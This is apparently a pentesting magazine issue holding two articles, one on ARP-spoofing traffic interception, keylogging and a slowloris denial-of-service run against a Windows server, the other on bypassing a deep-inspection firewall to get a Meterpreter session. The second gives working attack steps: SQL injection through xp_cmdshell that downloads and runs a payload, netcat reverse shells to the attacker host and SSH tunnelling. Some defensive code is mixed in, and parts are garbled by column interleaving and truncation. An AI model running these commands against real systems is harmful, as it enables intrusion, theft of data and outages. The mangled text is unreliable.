Using Ettercap we copied traffic from the user and the gateway to our pentesting laptop. We used Ettercap with the following attempt to see traffic: sslstrip, urlsnarf, dsniff, and Driftnet, with these commands entered. In Ettercap, we scanned the subnet and added a target 1 = gateway and target 2 = the victim machine. Here, we were able to get a copy of everything being sent by the user to the laptop (attacker) first, before going to the real gateway. This is done with sslstrip, iptables, and ettercap with the MITM attack arp spoofing. It is very important, in a test where you are trying to conceal what you are doing from detection, that you ensure your laptop is able to handle the traffic. You must be ready to execute the sequence of commands in order to avoid seeing packets destined to the same IP address twice.

Each attack and tool used has its benefits and limitations. The idea was to see data going across for corporate espionage and sent to a competitor for money. The tools were researched and chosen for this pentest to see what would really come across the wire. The following is a brief overview of each tool.

SSLstrip
A tool that prevents a connection from upgrading to an SSL session in an unnoticeable way. Also, the history behind this is that one could forge a certificate as being signed and trusted in order to appear as an https session, or that the session was legitimate with the intended server that actually ended up being the attacker (Wikipedia).
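On the defensive side, the ARP poisoning that ettercap's ARP:REMOTE mode relies on (one laptop answering ARP for both the gateway and the victim) is visible to anyone watching ARP replies on the segment. The Python below is an added example, not code from the article: it keeps an IP-to-MAC table and raises an alert on the two symptoms; the gateway address 10.10.10.1 and all MAC addresses are constructed sample values.

```python
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ArpReply:
    """One observed ARP reply (is-at): who claims which IP, and when."""
    ts: float
    sender_ip: str
    sender_mac: str


class ArpWatch:
    """Track IP-to-MAC bindings from ARP replies and report the two things an
    ARP:REMOTE poison produces on the wire: a known binding flipping to a new
    MAC, and one MAC claiming several IPs (gateway and victim at once).
    Bindings may be seeded from a trusted inventory (DHCP leases, switch table)."""

    def __init__(self, trusted=None):
        self.bindings = dict(trusted or {})       # ip -> first (or trusted) mac
        self.ips_by_mac = defaultdict(set)        # mac -> ips it has claimed
        self.reported = set()                     # (ip, mac) pairs already alerted on
        self.alerts = []
        for ip, mac in self.bindings.items():
            self.ips_by_mac[mac].add(ip)

    def observe(self, reply: ArpReply):
        known = self.bindings.get(reply.sender_ip)
        if known is None:
            self.bindings[reply.sender_ip] = reply.sender_mac
        elif known != reply.sender_mac and (reply.sender_ip, reply.sender_mac) not in self.reported:
            # A binding change can be legitimate (NIC swap, failover), so it is
            # reported once per new MAC and the first MAC stays on record.
            self.reported.add((reply.sender_ip, reply.sender_mac))
            self.alerts.append(("binding-change", reply.ts, reply.sender_ip,
                                known, reply.sender_mac))
        claimed = self.ips_by_mac[reply.sender_mac]
        before = len(claimed)
        claimed.add(reply.sender_ip)
        if len(claimed) > 1 and len(claimed) > before:
            # A single MAC answering for several IPs is the ARP:REMOTE signature.
            # Hosts that legitimately hold several addresses (routers, VRRP)
            # need an allow-list in front of this check.
            self.alerts.append(("multi-ip", reply.ts, reply.sender_mac,
                                tuple(sorted(claimed))))

    def feed(self, replies):
        """Process replies in time order and return the accumulated alerts."""
        for reply in sorted(replies, key=lambda r: r.ts):
            self.observe(reply)
        return self.alerts


# Constructed capture: the lab hosts from the article (10.10.10.5, 10.10.10.7)
# plus a constructed gateway 10.10.10.1; a laptop at cc:...:99 then claims
# the gateway and the workstation, and repeats the poison.
SAMPLE_REPLIES = [
    ArpReply(1.0, "10.10.10.1", "aa:aa:aa:aa:aa:01"),   # gateway (constructed)
    ArpReply(2.0, "10.10.10.5", "aa:aa:aa:aa:aa:05"),   # application server
    ArpReply(3.0, "10.10.10.7", "aa:aa:aa:aa:aa:07"),   # user workstation
    ArpReply(20.0, "10.10.10.1", "cc:cc:cc:cc:cc:99"),  # laptop claims the gateway
    ArpReply(21.0, "10.10.10.7", "cc:cc:cc:cc:cc:99"),  # and the workstation
    ArpReply(22.0, "10.10.10.1", "cc:cc:cc:cc:cc:99"),  # poison is repeated
]


def detect_poisoning(replies=SAMPLE_REPLIES, trusted=None):
    """Run the watcher over a list of replies and return its alerts."""
    return ArpWatch(trusted).feed(replies)


if __name__ == "__main__":
    for alert in detect_poisoning():
        print(alert)
```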

Listing 1. Target picking

Execute the following commands


In the CLI we entered:
root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/#cat /proc/sys/net/ipv4/ip_forward
root@bt:# sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
Now verify it took the filter
root@bt:~# iptables -L -t nat
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:www redir ports 10000
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
root@bt:# sudo python sslstrip.py -l 1000 -f lock.ico

Dsniff
A tool used to sniff anything of interest like email or passwords. Arp spoof has to be running of course so that the traffic is routed through the attacker PC and back out to the real router and PC (Wikipedia).

Driftnet
This tool allows you to see what images are going across the user's browser while surfing the web. In this test users were not on the internet but were using a browser to launch an application which we wanted to see.

Urlsnarf
A tool that places all visited URL output into a file for easy reviewing. Not a tool that provides much advantage in this pentest.

Meterpreter
This tool can be used to take advantage of many vulnerabilities in different platforms in order to gain root access or control of a PC.

Script Execution
In the following presentation of code we see that numerous attempts utilizing ettercap and arp spoofing were done to send traffic to the attacker. Each tool was run alongside ettercap to see what information would actually pass to the attacker. The most exciting tools were Driftnet and meterpreter because of what could be seen and the control.

ettercap --mitm ARP:REMOTE --text --quiet --write /root/sslstrip/ettercap.log --iface eth0

Listing 2. Technical Output

root@bt:~# urlsnarf -n -i eth0


urlsnarf: listening on eth0 [tcp port 80 or port 8080 or port 3128]
10.10.10.7 - - [15/Jan/2013:23:10:12 -0500] GET http://www.google.com/ HTTP/1.1 - - -
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
10.10.10.7 - - [15/Jan/2013:23:10:13 -0500] GET
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] GET http://www.mwsystems.com/servlet/servlet.FileDown
load?file=01540000000nqRS HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; WOW64; Trident/5.0)
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] GET http://www.mwsystems.com/servlet/servlet.FileDown
load?file=01540000000nr9Z HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; WOW64; Trident/5.0)
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] GET http://www.mwsystems.com/servlet/servlet.FileDown
load?file=01540000000nr9K HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; WOW64; Trident/5.0)
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] GET http://www.mwsystems.com/servlet/servlet.FileDown
load?file=01540000000nr9A HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; WOW64; Trident/5.0)
10.10.10.7 - - [15/Jan/2013:23:11:17 -0500] GET http://www.mwsystems.com/servlet/servlet.FileDown
load?file=01540000000nroD HTTP/1.1 - - http://10.10.10.5/ Mozilla/5.0 (compatible; MSIE 9.0;
Windows NT 6.1; WOW64; Trident/5.0)

Listing 3. Results: Images from core business application were not being sent to our laptop despite driftnet running

root@bt:~# driftnet -i eth0 -v


driftnet: using temporary file directory /tmp/driftnet-AmaowM
driftnet: listening on eth0 in promiscuous mode
driftnet: using filter expression `tcp
driftnet: started display child, pid 2562
driftnet: link-level header length is 14 bytes
.driftnet: new connection: 10.10.10.7:49363 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49365 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49364 -> 23.45.9.75:80
...driftnet: new connection: 10.10.10.7:49368 -> 23.45.9.75:80



Figure 4. Armitage Text Output of Key logging

Also the GUI was used to pick the target client Windows 7 machine 10.10.10.7 and, as second target, the application server 10.10.10.5 (Listing 1).

Results sslstrip
No data or text of any sort was visible, since all data was being passed through an encrypted channel.

Results with dsniff
Web addresses were visible, but no usernames or passwords. These results show that the application is very secure.

Results with driftnet
There were no pictures or images of the site going across. There were web addresses being listed.

Results with urlsnarf
The only thing that came through here was some local address space and some internet address space, redacted for publication. Still there were no real gems of information for quick gains (Listing 2).
Executed commands (example):

root@bt:/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:/# cat /proc/sys/net/ipv4/ip_forward
1

In another terminal, we used Driftnet:

root@bt:/# driftnet -i eth0
root@bt:/# driftnet -i eth0 -v -s (in an attempt to gain audio being streamed)

We could then see what the user was looking for at images (Listing 3).

Meterpreter
With Meterpreter used in Armitage, the connection made it impossible to glean any data or provide a way to leak data out; Meterpreter was used in this test. Knowing the administrator password, the connection was possible. Even a regular user with a known password would be able to both pass the hash dump and crack passwords later in order to attempt to escalate privileges. Time being the factor is how successful the cracker would be by going slow and password cracking.

Results
We were able to log keystrokes and take screen shots of the user's computer. This is one way data could be captured. In this test, we show that key logging and screen captures are possible; however, they are not very effective, as shown below in Figure 7. Anything that was operating on the application level of the OSI model remained visible and the tool worked. When things went encrypted at the network level it was impossible to see (Figure 4-7).

We have seen before that the desktop can be captured with screen shots and information could be leaked this way. However, notice in image number 7 that the application icon is present as a big S in the toolbar, and on the workstation it is in the foreground. However, the image reveals that it is not seen and therefore encrypted to the reverse tcp shell. That S represents the business's core business application. The launch HTML page is the only visible part of the application, which is done on port 80. This demonstrates that the application running on the computer was able to encrypt all activity for queries, results, and navigation.

Figure 5. Email Credentials Entered

DoS Slowloris Python Script
Now we get to some fun. Besides trying to sniff traffic and look at client proprietary data, we can also try to make their systems unavailable to them for this test. Remember that an unavailable system is loss of income or a serious impact that can make generating income and staying operational difficult to do. The script that we will use is a python script called slowloris. This script can be found at http://ha.ckers.org/slowloris/. There is a script for IPv6

as well. This script is unique in that it does not try to hammer the web server right away with a full load of requests, but rather it comes in waves. There is a setting in the script for the number of connections per second and the frequency of those connections. These two fields were used against the server. The server was a Windows Server 2008 R2 (fresh install and no updates).

In order to start the script after you have downloaded it to your pentest PC, you have to start with what is supposed to work and then review the results and make changes. The changes that we made were simple, as each time slowloris runs it makes a whole bunch of half requests to the web server. The requests never get finished and the web server is just sitting there with a session consumed, waiting for the user to resume communication. This weakness is known for some Apache servers but not on IIS 7.0. At the time of this test, it was unknown, but I thought it would be fun to try. Also check to make sure that you have Perl installed (perl -v), as most Linux instances do.

We modified the script to change the number of connections and then we lowered the timeout period for waiting to start that new connection. As the script ran, we would notice the CPU on the server would spike to 78% and then 100% and then go down again as the script had entered its wait interval. Then it would run again and we would see similar results on the CPU. Now as far as hacking goes, if you do not get the results you want, just keep trying. So we stopped the script and changed the connections per second to the maximum, so it would take 10,000 per second, and tested again. After the second run, the Server 2008 R2 would just take a hit but continue to serve out the web page. Unfortunately for the pentester, there was no break in service. Fortunately for the company running the software, they stayed operational. As a side note, for a non-Linux tool we used the Low Orbit Ion Cannon multiple times on the server in addition to slowloris, and still the web site was up.

The following commands will result in the same activity as we tested earlier in 2013.

./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 10000 -https

Figure 6. Screenshot Before Launching Encrypted Application
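What makes slowloris recognisable on the server side is exactly the pattern the text describes: many connections from one client, each holding a half-finished request header open across the wait interval. The Python below is an added example (not the article's script): it flags that pattern in a constructed connection-table snapshot, and shows why a request-header timeout plus a per-client cap catches it while a plain idle timeout does not. The client addresses and the snapshot are constructed.

```python
from dataclasses import dataclass


@dataclass
class Conn:
    """One in-flight HTTP connection as a server's connection table describes it."""
    client_ip: str
    opened_at: float        # epoch seconds
    header_complete: bool   # has the request header been closed by a blank line?
    last_byte_at: float     # when the client last sent anything


def find_slow_clients(conns, now, min_age=10.0, threshold=20):
    """Return {client_ip: count} for clients holding at least `threshold`
    connections whose request headers are still incomplete after `min_age`
    seconds. A browser keeps a handful of connections and finishes its headers
    in milliseconds; slowloris keeps hundreds open and sends one header line
    per wait interval so they never finish."""
    stale = {}
    for c in conns:
        if not c.header_complete and now - c.opened_at >= min_age:
            stale[c.client_ip] = stale.get(c.client_ip, 0) + 1
    return {ip: n for ip, n in stale.items() if n >= threshold}


def idle_timeout_drops(conns, now, idle=30.0):
    """A plain idle timeout (no bytes for `idle` seconds) is what many servers
    apply by default. Slowloris trickles a header line every few seconds, so
    its connections are never idle and this catches none of them."""
    return [i for i, c in enumerate(conns) if now - c.last_byte_at > idle]


def connections_to_drop(conns, now, header_timeout=20.0, per_client_incomplete=10):
    """Mitigation modelled on request-header timeouts and per-client caps:
    drop any connection whose header has not completed within `header_timeout`
    seconds, and allow each client at most `per_client_incomplete` unfinished
    requests, closing the oldest beyond that. Returns the indices to close."""
    drop = set()
    by_client = {}
    for idx, c in enumerate(conns):
        if c.header_complete:
            continue
        if now - c.opened_at > header_timeout:
            drop.add(idx)
        else:
            by_client.setdefault(c.client_ip, []).append(idx)
    for idxs in by_client.values():
        idxs.sort(key=lambda i: conns[i].opened_at)
        drop.update(idxs[:max(0, len(idxs) - per_client_incomplete)])
    return sorted(drop)


def build_sample(now):
    """Constructed snapshot: two ordinary clients and one host behaving like
    slowloris (200 connections opened in four waves 15 s apart, each kept alive
    by a partial header line sent a second ago)."""
    conns = [
        Conn("10.10.10.7", now - 0.3, True, now - 0.2),
        Conn("10.10.10.7", now - 1.1, True, now - 1.0),
        Conn("10.10.10.9", now - 5.0, False, now - 4.9),   # slow, but alone
    ]
    for i in range(200):
        wave = i // 50
        conns.append(Conn("192.0.2.10", now - 60 + wave * 15, False, now - 1))
    return conns


if __name__ == "__main__":
    now = 1_700_000_000.0
    sample = build_sample(now)
    print("slow clients      :", find_slow_clients(sample, now))
    print("idle-timeout drops:", len(idle_timeout_drops(sample, now)))
    print("header-policy drops:", len(connections_to_drop(sample, now)))
```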
Figure 7. After Launching Encrypted Application

In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or as part of a package like Armitage, Kali, Ubuntu, and of course the Metasploit framework. This gives penetration testers the tools they need to perform tests against vulnerabilities by testing the exploits with different payloads. Some Windows based tools that can be used have gained notoriety, but still Linux is a preferred platform. What is great about Linux and the open source community is that there are a lot of people contributing to its success. That is something that will carry the distributions forward as time and technology change.

Kevin Pescatello


Bypassing new generation Firewalls with Meterpreter and SSH Tunnels
During a recent penetration test I found a Windows host running a web application that let me execute code via an SQL injection error. The host was a Windows 2003 Server with an SQL Server 2005. It was part of a local area network (LAN), and my intention was to use it to pivot to other hosts on the LAN, up to creating a Domain Administrator account for myself and taking possession of the entire network.

At this point, my attack vector was very clear:

Upload and run a meterpreter payload to get a remote session.
Escalate privileges on the remote host.
Capture the hash of the Administrator to use it on other hosts.
Use a Delegation Auth Token of a Domain Admin user to impersonate it, and use it to create a Domain Administrator user.
Use the host as a gateway to access other hosts and servers on the LAN.

By testing the above attack vector, some problems were detected that had to be solved to achieve the ultimate goal.
The main problem was that after uploading a reverse meterpreter payload to the host and running it, the reverse connection did not reach its destination. My first thought was that a firewall was blocking access to unusual ports, so I repeated the process, this time using a payload trying to connect to port 80 of my machine, but that did not work either.
The same test using netcat worked, so I figured out that the problem was related to the firewall blocking meterpreter packets, probably for being a Deep Inspection Firewall with the signatures of meterpreter in its signature file.

To solve the problem, I used encryption, since a firewall can only inspect packets in clear, not encrypted ones. To ensure packets were encrypted end-to-end (from the compromised machine to my local machine), I used an SSH tunnel, successfully achieving my goal of bypassing that security barrier.
In this article I will try to explain step by step all the processes involved to bypass the deep inspection firewall and achieve a meterpreter session with the remote host. The reason for wanting a meterpreter session is the ease with which you can escalate privileges and pivot to other hosts from the Metasploit Framework.
The process is summarized as follows:

Raise the necessary tools to the remote host.
Establish an ssh tunnel forwarding the needed ports.
Launch the meterpreter payload through the tunnel.
Receive the meterpreter session on the other side of the tunnel.

How to upload the payload?
When we have access to a Linux system, we usually have no problem uploading files to it, because normally any Linux distribution comes with wget or curl, so we just need a web server to publish the binaries



and download them using any of these tools. But in Windows, things are different. By default we do not have any of these tools or similar ones. We could try to open Internet Explorer or Firefox, if installed, to download the file, but there is a danger that the program remains pending user interaction, and not being at the screen would be a problem with that. So what I did (sure there are more ways) was to use the ftp command from Windows.
By default ftp is an interactive program. When executed it asks for a username and password to log in. Once you are logged in, the wanted orders or commands can be introduced, ending the session with a bye.
But the ftp for Windows provides the ability to use it in a non-interactive way, passing in a text file all the strings that you need to send to the FTP server. This is achieved with -s file.txt.
These are the steps I used to upload the files:

First I leave a file called met.exe (reverse meterpreter payload) in a public ftp.
Using the SQL injection I found, inject the following system command:

;exec master..xp_cmdshell '(echo ftp& echo kk@& echo bin& echo get met.exe& echo bye) >ftp.txt';exec master..xp_cmdshell 'ftp -s:ftp.txt IPServerFTP'; --

This injection creates the file ftp.txt with the following contents:

ftp
kk@
bin
get met.exe
bye

And then it calls the ftp command, passing as parameters -s and the file we just created.
The result of this is that the host will connect to the FTP server, authenticate an anonymous session, execute the command bin, execute get met.exe, which will download the file to the system, and end the FTP session with the bye command.
At this moment we have the payload on the remote host, and we only need to run it with another SQL injection, and put a Metasploit handler on the attacker host to get a meterpreter session.
This is the SQL injection we would use:

;exec master..xp_cmdshell 'start /B met.exe';--

The /B switch of the start command prevents opening a cmd window while running the program. It could also have been called simply as met.exe, but this would have left the process running the query, and for another injection it would have had to open a new window, because if it was canceled or closed, the meterpreter session died unless it had migrated to another process.

Firewalls and Next Generation Firewalls
Today there are different types of firewall. We can make a first classification between Network Firewalls and Host Firewalls.
Among the Network Firewalls, there are also different types, generally classified into three generations:

1st Generation: packet filters (stateless). They work mostly at layer 3 (network layer) of the OSI model (layer 4 is just used to get the port numbers), filtering packets according to the information contained in the header (source IP, destination IP, protocol, source port and destination port). They do not keep information about current connections.
2nd Generation: Stateful Firewall. Keeps track of the state of network connections (such as TCP streams, UDP communication) traveling across it.
3rd Generation: Application level firewalls.

As new technologies are emerging, the classification changes.
Deep Packet Inspection (DPI) is the technology used by IDS/IPS to monitor packets looking for protocol violations, viruses, spam, malware, etc. Next Generation Firewalls include, among other features, DPI technology to detect and block threats.
This article focuses on deep packet inspection firewalls, and how to bypass the malware detection feature to get a meterpreter remote session.
Packet filtering firewalls are devices that filter incoming and outgoing traffic of a network, monitoring IP addresses and ports. Basically they work with access control lists (ACLs), which are static. They can do nothing against an attack via http if the http protocol is allowed on the network.
Next Generation Firewalls go further, trying to figure out the type of traffic traveling in each packet, providing IDS capabilities, content management, dynamic packet blocking, etc.
Traffic inspection is essentially based on signatures (unique patterns to each malware type that

IDS or antivirus manufacturers use to recognize such malware). So if it detects a malware signature in a packet, it blocks or rejects the current connection and, in some cases, warns the administrator.
To accomplish this, the firewall captures every packet, checks its header and data section (if any) and, if everything is correct and complies with the security policy of the company, the packet is forwarded by the outgoing interface.
As usual, the meterpreter payload signature can be found in most antivirus databases, as well as in IDS and firewall signature databases. That means that in case a meterpreter reverse connection were launched from inside a network with this type of protection, the payload should be detected and the connection would be rejected.
This was the case I found during my last penetration test.
So, what then? How to get a meterpreter session on the remote host?
Both firewalls and IDS inspect the packet contents in clear. To bypass the inspection, the solution is to encrypt from end to end the data traveling in those packets, so these devices would not understand it.
How to make a meterpreter reverse connection over an encrypted channel from end to end, passing the firewall?
This is where SSH tunnels come into play. SSH allows us to send encrypted traffic on a channel that firewalls usually allow. We need to launch an SSH connection from within the LAN to an Internet server and use that channel we created to open a reverse connection (get a shell or session on the remote machine).
The first step is to analyze what we can do from the remote machine: where can we connect, what ports and protocols can we use, etc.

Analyze what the firewall allows
We know that the remote host can make connections to the Internet on port 21 (FTP), since it is precisely what we have done to upload our payload.

mote host to our local host (with public IP address) on different ports. Usually we try the most common ports like 80 (http), 443 (https), 53 (dns), 25 (SMTP), 22 (ssh), etc. We try non standard ports like 6666 to find out if there are restrictions on outgoing connections.
To perform this procedure we upload nc.exe (netcat) and plink.exe (PuTTY ssh client for the command line) using the ftp procedure explained before. Then, in the local host (attacker host), put a netcat listening on a port we want to try, for example port 21.

root@kali:~# nc -vvv -l -p 21
listening on [any] 21 ...

And in the remote host, using the SQL injection:

;exec master..xp_cmdshell 'nc.exe IP_Kali 21 -e cmd.exe';--

This opens a connection between the remote host (any port) and the local host (port 21) and spawns a cmd.exe, giving us a remote shell.

Figure 1. Netcat listening on port 21 receives a connection from remote host and spawns a shell

From this shell, we can execute commands more conveniently than using SQL injection.
To see what ports we can use, just repeat the procedure trying other ports.
To achieve our final goal, we need at least two ports, because we need two different sessions, one to create the ssh tunnel, and another to execute the payload.
Surely someone asks why would we do this if we
load before. already have a remote shell on the victim host?.
Usually, many firewall configurations, block both The answer is easy. There are different techniques
inbound and outbound traffic on a LAN, except for that allow us to escalate privileges and pivot to
certain allowed services, such as world wide web, other systems, but a meterpreter session makes
ftp, ssh, etc. Other more permissive configurations things easier, both to escalate (with getsystem) as
allow any connection from inside the LAN to the In- to pivot, using the session as gateway to the vic-
ternet and just blocks the incoming traffic to a non tims LAN.
allowed services. In the present case, after making several tests
We need to find which ports can we use to con- with netcat I could see that from inside the LAN
nect. To find it out, we try to connect from the re- had unrestricted access to the Internet.

EXTRA 05/2013(16) Page 46 http://pentestmag.com
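The egress test above is done one port at a time with a netcat listener. The script below is an added example, not part of the original article: it does the attacker-host side for a whole list of ports at once, listening on every candidate port and recording which ones receive a connection, so that a single loop of nc.exe IP_Kali <port> on the compromised host reveals the outbound policy in one pass. The peer address it records is whatever the firewall presents, so behind NAT it will be the firewall's public address, as the article observes later. The probe() function stands in for the nc.exe loop so the example can be exercised on loopback; the default port list is an assumption, and binding the privileged ports in it needs root on the listener host, as on the article's Kali box.

```python
import socket
import sys
import threading

# Candidate ports from the article's egress test plus one non-standard port
# (an assumed list); binding the privileged ones needs root on the listener.
DEFAULT_PORTS = [80, 443, 53, 25, 22, 6666]


class EgressListener:
    """Listen on many TCP ports at once and record which ones get a connection.
    Runs on the attacker host; the compromised box tries each port with nc.exe.
    A hit means the firewall allows outbound traffic to that port.
    Port 0 binds an ephemeral port (used by the loopback self-test)."""

    def __init__(self, ports, bind_addr="0.0.0.0"):
        self.bind_addr = bind_addr
        self.requested = list(ports)
        self.hits = []                       # (listening port, peer address)
        self._lock = threading.Lock()
        self._stop = threading.Event()
        self._servers = []
        self._threads = []

    def start(self):
        for port in self.requested:
            srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            srv.bind((self.bind_addr, port))
            srv.listen(5)
            srv.settimeout(0.2)              # lets the accept loop poll _stop
            self._servers.append(srv)
            t = threading.Thread(target=self._accept_loop, args=(srv,), daemon=True)
            t.start()
            self._threads.append(t)
        return self.bound_ports()

    def bound_ports(self):
        return [srv.getsockname()[1] for srv in self._servers]

    def _accept_loop(self, srv):
        port = srv.getsockname()[1]
        while True:
            try:
                conn, peer = srv.accept()
            except socket.timeout:
                if not self._stop.is_set():
                    continue
                srv.settimeout(0)            # stopping: take what is queued, then leave
                try:
                    conn, peer = srv.accept()
                except OSError:
                    return
            except OSError:
                return
            with self._lock:
                self.hits.append((port, peer[0]))
            conn.close()                     # reachability is all we need

    def reachable_ports(self):
        with self._lock:
            return sorted({port for port, _ in self.hits})

    def stop(self):
        self._stop.set()
        for t in self._threads:
            t.join()
        for srv in self._servers:
            srv.close()


def probe(host, ports, timeout=2.0):
    """Client side, what the nc.exe loop on the victim does: one TCP connect
    per candidate port. Returns the ports that accepted the connection."""
    reached = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                reached.append(port)
        except OSError:
            pass
    return reached


if __name__ == "__main__":
    # python3 egress_listener.py 80 443 53 25 22 6666   (Ctrl-C to report)
    wanted = [int(p) for p in sys.argv[1:]] or DEFAULT_PORTS
    listener = EgressListener(wanted)
    print("listening on ports", listener.start())
    try:
        threading.Event().wait()
    except KeyboardInterrupt:
        listener.stop()
    for port, peer in listener.hits:
        print(f"port {port} reached from {peer}")
    print("outbound allowed:", listener.reachable_ports())
```

Because the listener only needs to see the TCP handshake, it closes each connection immediately; the victim side therefore sees nc.exe exit at once on an allowed port and time out on a blocked one, which is the same signal the article reads off the single-port netcat session.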


SSH Tunnels
Once satisfied that we can connect to any port with netcat, now it is the turn of plink.exe, our SSH client for Windows.
The goal is to make an SSH connection from the victim system to our host (Kali Linux).
And why do we want to connect to our host? Easy too: because SSH allows port forwarding between hosts using the established SSH connection. As you know, an SSH connection is encrypted, and firewalls usually allow it if it is coming from within the LAN to the Internet.
The purpose of this is to make an SSH tunnel forwarding port 6666 on the remote host (the victim) to port 6666 on the local host, so that everything you send to port 6666 on the remote host goes to port 6666 on the local host.
Then we have to create a meterpreter payload connecting to 127.0.0.1:6666 and, on the other end of the tunnel, set up a Metasploit handler on port 6666 of the local IP address.
Well, first let's see how SSH tunnels work.
SSH allows three types of port forwarding: local port forwarding, remote port forwarding and dynamic port forwarding.

Local Port Forwarding
Local port forwarding allows us to open a socket on the local host connected to a port on a remote host. Communication flows from local to remote.
The command syntax is:

ssh -L <local port>:<remote host>:<remote port> <gateway>

Example:

ssh -L 6666:www.gmail.com:80 SSH-SERVER

The above example would connect local port 6666 to port 80 on www.gmail.com through SSH-SERVER. If we opened the browser on the local host and visited http://localhost:6666 we would reach the Gmail website, and Google's logs would show the connection coming from SSH-SERVER.
This is very useful in a penetration test in the following case. Imagine you have SSH access to a host located on the LAN of our client behind a NAT firewall, which in turn is connected to another host on the LAN where there is a server with Terminal Services enabled to receive connections only from the LAN.
Suppose the public IP address of the firewall is 10.10.0.1, the IP address of the SSH server within the LAN is 192.168.0.10 and the IP address of the Windows server is 192.168.0.11.
We launch our SSH tunnel like this:

root@kali:~# ssh -L 6666:192.168.0.11:3389 10.10.0.1

This connects our local port 6666 to port 3389 on host 192.168.0.11 (the Windows server). Now we can connect to the server using rdesktop like this:

root@kali:~# rdesktop localhost:6666

Remote port forwarding
Remote port forwarding creates a socket on the SSH server host connected to the host and port you specify. That host must be reachable by the SSH client, not necessarily by the server. Basically it is the same as local port forwarding; the difference is that the socket is created on the remote machine.
Suppose the example above, but now instead of having access to an SSH server, we just have access to a host with an SSH client. We need to configure an SSH server on our local host and launch the client from the remote host to our server, redirecting port 6666 on the local host (which now has the SSH server) to port 3389 of the internal Windows host (a host reachable by the remote host running the SSH client).
The syntax is as follows:

ssh -R <server port to open>:<remote host>:<remote port> <server>

Example (executed from a host in the 192.168.0.0/24 LAN):

ssh -R 6666:192.168.0.11:3389 SSH-SERVER

After running this, the local host can launch rdesktop to connect to the Windows server.

root@kali:~# rdesktop localhost:6666

Dynamic port forwarding
This type of forwarding creates a SOCKS proxy on the specified port on the client host that can be used by programs such as proxychains to reach remote networks using the tunnel as a gateway.
The syntax is:

ssh -D <port> <server>

Example:

root@kali:~# ssh -D 9050 10.10.0.1

This example creates a SOCKS proxy on port 9050 on the local host, from which we can reach any port of any host within the SSH server's LAN (we can reach any host the SSH server host can reach).
Continuing with the same scenario, now we configure proxychains to use port 9050 of localhost and then reach the terminal server at 192.168.0.11 with the following command:

root@kali:~# proxychains rdesktop 192.168.0.11

OpenSSH and PuTTY
After seeing how SSH tunnels work, it is quite clear what we need: a connection from the remote host to our attacking host, using local port forwarding to open a port on the remote host that connects to a port on our local host.
SSH is an interactive command. When we invoke it to connect to a remote host, it first checks the host key of the server and, if it does not know that host, asks whether you want to connect. If yes, it then asks for the password of the user you specified when invoking the command.
When working from a console obtained via netcat or directly from SQL injection, we cannot use this type of interactive command, because we do not have access to the standard file descriptors and therefore the command will wait for a response that cannot be sent.
To fix this, we can invoke ssh (we are talking specifically about OpenSSH, the most widely used SSH package on Linux, http://www.openssh.org/) with -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no so that it does not check the key of the remote server; also, in the case of ssh on Unix/Linux, we can put the public key of the user who will connect into the file ~/.ssh/authorized_keys on the remote host, so that it does not ask for a password.
In this case we will use plink.exe from Windows. Here you can specify -l user -pw password to pass the username and password without having to copy keys around (note that a password given on the command line is visible to anyone who can list processes on that host).
Plink is the command-line version of an SSH client known as PuTTY, widely used in Windows environments. Plink offers no parameter to skip the server key check, so the first time we connect to a new host it will show the "Store key in cache?" prompt. You cannot avoid this, but you can work around it. We can invoke plink.exe for the first time against a host like this:

C:\>echo y | plink.exe -l user -pw password SSH-SERVER

The command will invoke plink.exe and, when asked whether you want to add the unknown server key to the cache, it will pass the character y; plink will save the key and go on with its normal execution.
From then on we have the remote host key in PuTTY's cache, which can be found in the Windows registry under the key HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys. If you need to open a second SSH tunnel against the same host, the echo y is no longer necessary.
Well, suppose the following scenario (for demo purposes we use two private IP address ranges; 10.10.0.x stands for public addresses):

Public IP attacker machine: 10.10.0.10
Firewall public IP: 10.10.0.20
Network IP LAN: 192.168.65.0/24
Private IP Firewall: 192.168.65.254
Private IP of the host behind the firewall: 192.168.65.10
Private IP of the second host behind the firewall: 192.168.65.15

First, we create our meterpreter payload pointing to port 6666 of 127.0.0.1 (localhost). This payload, when invoked from a Windows host, will make a connection to the host itself (127.0.0.1) on port 6666.

Figure 2. The creation of a meterpreter reverse tcp shell in binary form with msfvenom

We upload this payload, plink.exe and nc.exe to the victim host. Once the three files are uploaded, we first make a connection with netcat to have a console where we can execute commands, because it will always be more comfortable than any SQL injection or PHP shell.
Note that the connection to our host comes from 10.10.0.20, but the IP of the remote host is 192.168.65.10. That is because the host is behind a NAT firewall.
